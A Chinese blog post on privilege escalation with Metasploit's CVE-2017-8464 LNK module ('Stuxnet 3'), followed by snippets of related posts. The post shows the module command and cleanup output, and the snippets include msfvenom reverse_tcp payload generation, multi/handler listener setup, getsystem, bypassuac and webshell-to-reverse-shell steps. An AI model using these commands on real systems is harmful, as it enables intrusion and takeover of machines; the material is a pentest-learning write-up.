msf之使用震网三代来提权

最新推荐文章于 2022-07-22 21:27:59 发布
最新推荐文章于 2022-07-22 21:27:59 发布
阅读量310 收藏 4
点赞数
分类专栏: Linux kali web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44902875/article/details/104719282
版权
web安全 同时被 3 个专栏收录
61 篇文章 2 订阅
订阅专栏
Linux
27 篇文章 0 订阅
订阅专栏
kali
21 篇文章 2 订阅
订阅专栏

cve_2017_8464_lnk_lpe,他就是震网三代的exploit
上次没有成功将x64的搞定,现在搬来了震网三代
看我来个远程执行漏洞的提权
前面已经拿到shell,但没有system权限
在这里插入图片描述
我也是稍微找了以下exploit,真是大海捞针

在这里插入图片描述
偶然发现

use exploit/windows/local/cve_2017_8464_lnk_lpe

在这里插入图片描述
设置好sessions,直接把权限提到system
在这里插入图片描述
可怕,视乎还删除了什么

[!] Tried to delete C:\Users\hack\ruwkHlybgqtAAonb.dll, unknown result
[!] Tried to delete C:\Users\hack\gqSvmAVDKpXoSASr.lnk, unknown result
佛性死磕
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
震网三代在metasploit-framework上的复现与利用
GUINEW的博客
08-25 1943
震网病毒新家族震网三代的利用复现,美国攻陷伊朗工业设施的网络核武器。
震网三代利用
qq_38240166的博客
05-16 1774
笔者在最近想了个问题,学校机房关闭进不去,然后教师机子无ip如何黑入,而且不在同一个网段下面,如何入侵呢,于是看到莲一篇关于隔离网络攻击的文章。想到了一年前一个漏洞,于是测试开始。首先我们来了解一下“震网三代”它可以利用移动介质,受害者只要开启了自动播放或者点击了漏洞触发就会使系统触发漏洞。环境:            ubuntu16.04            vmware14  and wi...
震网三代和二代漏洞技术分析报告
爱国小白帽
04-08 914
震网三代和二代漏洞技术分析报告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 概述 2017年6月份微软补丁发布了一个针对Windows系统处理LNK文件过程中发生的远程代码执行漏洞,通用漏洞编号CVE-2017-8464。 当存在该漏洞的电脑被插上存在漏洞文件的U盘时,不需要任何额外操作,漏洞攻击程序就可以借此完全控制用户的电脑系统。同时,该...
CVE-2017-8464(震网三代)漏洞分析与复现
dgjkkhcf的博客
07-22 3951
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
震网三代cve_2017_8464漏洞复现
04-05 1348
影响版本:   windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008   以下文章中<   >里的内容为需要输...
Metasploit渗透测试框架的基本使用
ma963852的博客
11-25 2908
Metasploit简介
Kali学习3——MSF
不会心跳的博客
01-26 1514
metasploitable2 metasploitable为基于ubuntu的靶机。 下载后直接打开虚拟机即可。 默认账号密码是msfadmin # 设置root密码 sudo passwd root # 设置固定IP vi /etc/network/interfaces auto eth0 iface eth0 inet static address xxx.xxx.xxx.xxx netmask 255.255.255.0 gateway xxx.xxx.xxx.xxx # 重启网卡 /etc/i
使用冰蝎进行提权
weixin_45911307的博客
04-03 3595
提权: 点击反弹shell 查看攻击机kali的IP地址 填写攻击机kali的IP地址 然后在kali中执行以下操作 开启msf监听 使用use exploit/multi/handler 命令 此时弹出让我们输入payload的命令我们将此命令输入set payload php/meterpreter/reverse_tcp 此时输入成功 show options 我们就可以看设置了,我们会发现我们的靶机已经连上了 接着我们连上我们的主机 set lhost
冰蝎 连接木马到反弹shell拿到权限全过程
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎 “冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
MSF进行提权
aozhuo4755的博客
08-14 1467
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.16...
内网渗透-权限提升(使用MSF提权的一些方法)
Ping_Pig的博客
07-03 3290
讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法 直接输入提升权限命令 meterpreter>getsystem 使用MSF内置bypassuac提权 MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。 search bypassuac Matching Modules ================ # Name ...
Kali linux 2016.2(Rolling)中的Exploits模块详解
weixin_34376562的博客
11-08 5166
简单来讲,这个Exploits模块,就是针对不同的已知漏洞的利用程序。 root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtua...
冰蝎下反弹shell到MSF
good good study
04-15 6532
我们利用冰蝎获取到了一个shell,那接下来要反弹shell到VPS(阿里云)中的MSF,方便进行后渗透。 1. 如下,获取到了shell 2. 选择反弹shell 如下填写vps的ip,和监听的端口。下面有提示使用的payload我们将其填入msf中,对于不同的shell,这里生成的msf模块都会不一样,我们按照它给的填入就行 3. vps启动msf,设置本地的内网的网卡和监听的端口,如果只有一块网卡的话也可以填0.0.0.0,端口和冰蝎中反弹shell的填写的端口一样。 4. 在冰
震网三代(CVE-2017-8464)
m0_57379855的博客
03-31 2346
震网三代(CVE-2017-8464)CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
msf查找提权权限exp
qq_42526270的博客
10-10 1003
00x01 在我们拿到一个反弹shell后,下一步可以用metaspolit的内置模块 Local Exploit Suggester Local-exploit-suggester的功能就如它的名字一样,当我们用它来探测某一个系统时,他会告诉我们该系统有哪些exploit可能可以利用。但是由于该工具先是假设一个系统存在所有的相关漏洞,然后根据补丁信息再去排除,所以就导致误报率会高一点,例如一台机...
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2176
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
2021-08-27 网安实验-Windows系统渗透测试之LNK远程代码执行漏洞(CVE-2017-8464)
时光隧道
08-27 4万+
1. 关于漏洞 漏洞编号: CVE-2017-8464 漏洞名称: Microsoft Windows LNK 远程代码执行漏洞 官方评级: 高危 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 漏洞利用条件和方式:
msf提权linux
最新发布
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit Framework中,有一些常用的模块可以用于Linux系统的提权,例如: 1. exploit/linux/local/udev_netlink 这个模块利用了udev中的漏洞,通过发送特制的netlink消息来提权。 2. exploit/linux/local/overlayfs_priv_esc 这个模块利用了Linux内核中overlayfs文件系统的漏洞,通过创建特殊的文件来提权。 3. exploit/linux/local/sudo_pwfeedback 这个模块利用了sudo命令中的漏洞,通过修改sudo配置文件来提权。 这些只是Metasploit Framework中一小部分可用于Linux系统提权的模块,具体使用方法可以参考Metasploit Framework的官方文档或者相关教程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值